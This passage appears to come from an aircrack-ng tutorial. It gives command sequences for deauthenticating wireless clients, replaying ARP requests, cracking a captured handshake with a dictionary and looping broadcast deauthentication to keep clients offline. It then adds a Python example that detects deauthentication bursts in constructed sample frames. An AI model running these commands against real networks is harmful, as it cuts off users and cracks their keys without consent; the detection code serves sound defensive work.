Of course, this attack is totally useless if there are no associated wireless clients.
It is usually more effective to target a specific station using the -c parameter.
  airmon-ng start ath0
  airodump-ng ath0 out 6
  (switch to another console)
  aireplay-ng -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0
  (wait for a few seconds)
  aircrack-ng -w /path/to/dictionary out.cap

  airmon-ng start wlan0
  airodump-ng wlan0 out 6
  (switch to another console)
  aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0
  aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
After sending the five batches of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is mandatory and has to be the MAC address of an associated client.
  airmon-ng start ra0
  aireplay-ng -0 0 -a 00:13:10:30:24:9C ra0

With parameter 0, this attack will loop forever, sending deauthentication packets to the broadcast address and thus preventing clients from staying connected. Sadly, the most up-to-date drivers and firmware ignore deauthentications sent to broadcast, so you need to send them directly to the clients using the -c option as described above.
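Seen from the monitoring side, the directed and broadcast cases described above differ only in the destination address of the deauthentication frame. The following added example (not part of the original page or of aircrack-ng) parses raw 802.11 management headers and reports deauthentication bursts per BSSID and destination. It assumes frames without a radiotap header; the function names, the threshold of 5 and the sample frames are constructed for illustration.

```python
import struct
from collections import Counter

BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_deauth(frame):
    """Return (dst, src, bssid, reason) for a deauthentication frame, else None."""
    if len(frame) < 26:                      # 24-byte header + 2-byte reason code
        return None
    fc0 = frame[0]
    version, ftype, subtype = fc0 & 0x3, (fc0 >> 2) & 0x3, fc0 >> 4
    if (version, ftype, subtype) != (0, 0, 12):   # management frame, subtype 12
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)
    return mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def summarize(frames, threshold=5):
    """Count deauths per (bssid, destination, kind); keep groups >= threshold."""
    counts = Counter()
    for frame in frames:
        parsed = parse_deauth(frame)
        if parsed is None:
            continue
        dst, _src, bssid, _reason = parsed
        kind = "broadcast" if dst == BROADCAST else "directed"
        counts[(bssid, dst, kind)] += 1
    return {key: n for key, n in counts.items() if n >= threshold}

def build(dst, src, bssid, subtype=12, reason=7):
    """Construct a sample management frame (test data only, no radiotap)."""
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    header = bytes([subtype << 4, 0]) + b"\x00\x00" + raw(dst) + raw(src) + raw(bssid)
    return header + b"\x00\x00" + struct.pack("<H", reason)

AP, STA = "00:13:10:30:24:9c", "00:09:5b:eb:c5:2b"   # MACs from the commands above
SAMPLE = ([build(STA, AP, AP)] * 6            # constructed: burst aimed at one station
          + [build(BROADCAST, AP, AP)] * 2    # constructed: two broadcast deauths
          + [build(BROADCAST, AP, AP, subtype=8)])  # constructed: beacon subtype, ignored

if __name__ == "__main__":
    for (bssid, dst, kind), n in summarize(SAMPLE).items():
        print(f"{n} {kind} deauths for BSSID {bssid} -> {dst}")
```

Because the source address of these frames is not authenticated, the counts identify the affected BSSID and station, not the sender.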